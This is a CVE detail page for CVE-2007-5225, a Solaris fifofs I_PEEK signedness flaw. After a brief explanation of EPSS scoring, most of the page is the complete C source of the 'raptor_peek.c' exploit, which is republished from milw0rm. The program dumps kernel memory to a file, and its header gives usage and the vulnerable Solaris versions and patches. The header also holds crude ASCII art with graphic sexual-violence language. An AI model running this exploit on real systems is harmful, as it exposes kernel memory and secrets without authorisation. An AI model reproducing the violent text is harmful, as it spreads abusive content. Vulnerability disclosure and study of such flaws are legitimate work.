CVE-2007-5225 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* * $Id: raptor_peek.c,v 1.1 2007/10/18 08:09:02 raptor Exp $ * * raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak * Copyright (c) 2007 Marco Ivaldi <[email protected]> * * [Lame] integer signedness error in FIFO filesystems (named pipes) on Sun * Solaris 8 through 10 allows local users to read the contents of unspecified * memory locations via a negative value to the I_PEEK ioctl (CVE-2007-5225). * * /\ AS PART OF A VAST WORLD-WIDE CONSPIRACY * hjm / \ I COMMAND THEE: BEAT OFF UNTO ME * /,--.\ * /< () >\ IF I SAY "FNORD" AT THE END OF A SENTENCE * / `--' \ DOES THAT MAKE ME REALLY FUNNY OR SOMEONE * / \ WHO NEEDS TO GET FUCKING BEATEN TO NEAR * / \ DEATH AND THEN RAPED WITH A BROOM * /______________\ * AS YOU CAN SEE THAT'S REALLY TWO JOKES IN ONE * SO YOU REALLY GET YOUR MONEY'S WORTH HERE * Usage: * $ gcc raptor_peek.c -o raptor_peek -Wall * $ ./raptor_peek kerndump 666666 * [...] * $ ls -l kerndump * -rwx------ 1 raptor staff 666666 Oct 17 19:33 kerndump * * Vulnerable platforms (SPARC): * Solaris 8 without patch 109454-06 [tested] * Solaris 9 without patch 117471-04 [tested] * Solaris 10 without patch 127737-01 [tested] * * Vulnerable platforms (x86): * Solaris 8 without patch 109455-06 [untested] * Solaris 9 without patch 117472-04 [untested] * Solaris 10 without patch 127738-01 [untested] */ #include <errno.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <stropts.h> #include <unistd.h> #include <sys/stat.h> #define INFO1 "raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak" #define INFO2 "Copyright (c) 2007 Marco Ivaldi <[email protected]>" #define BADFIFO "/tmp/fnord" #define BUFSIZE 1000000 int errno; int main(int argc, char **argv) { int fd, fifo; size_t out, bufsize = BUFSIZE; char *buf; struct strpeek peek; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* read command line */ if (argc < 2) { fprintf(stderr, "usage: %s outfile [outsize]\n\n", argv[0]); exit(1); } if (argc > 2) if ((bufsize = atoi(argv[2])) == 0) { fprintf(stderr, "Error (atoi): invalid outsize\n"); exit(1); } /* print some output */ fprintf(stderr, "Using outfile\t: %s\n", argv[1]); fprintf(stderr, "Using outsize\t: %u\n\n", bufsize); /* prepare the output buffer */ if ((buf = (char *)malloc(bufsize)) == NULL) { perror("Error (malloc)"); fprintf(stderr, "Hint: Try again with a smaller output size\n"); exit(1); } memset(buf, 0, bufsize); /* create the named pipe */ unlink(BADFIFO); if (mknod(BADFIFO, S_IFIFO | S_IRWXU, 0) < 0) { perror("Error (mknod)"); exit(1); } switch(fork()) { case -1: /* cannot fork */ perror("Error (fork)"); exit(1); case 0: /* the child writes */ if ((fifo = open(BADFIFO, O_WRONLY, 0)) < 0) { perror("Error (open)"); exit(1); } write(fifo, "FNORD", 5); exit(0); default: /* the parent reads */ /* FALL THROUGH */ ; } /* perform the MAGICK */ if ((fifo = open(BADFIFO, O_RDONLY, 0)) < 0) { perror("Error (open)"); exit(1); } memset(&peek, 0, sizeof(peek)); peek.databuf.buf = buf; peek.databuf.maxlen = -1; /* FNORD! */ if (ioctl(fifo, I_PEEK, &peek) < 0 ) { perror("Error (ioctl)"); close(fifo); exit(1); } /* save output to outfile */ if ((fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0700)) < 0) { perror("Error (open)"); close(fifo); exit(1); } out = write(fd, buf, bufsize); fprintf(stderr, "FNORD! %u bytes written to %s\n", out, argv[1]); fprintf(stderr, "Hint: Try also with a bigger output size\n"); /* cleanup (who cares about free?;) */ close(fd); close(fifo); exit(0); } // milw0rm.com [2008-03-10]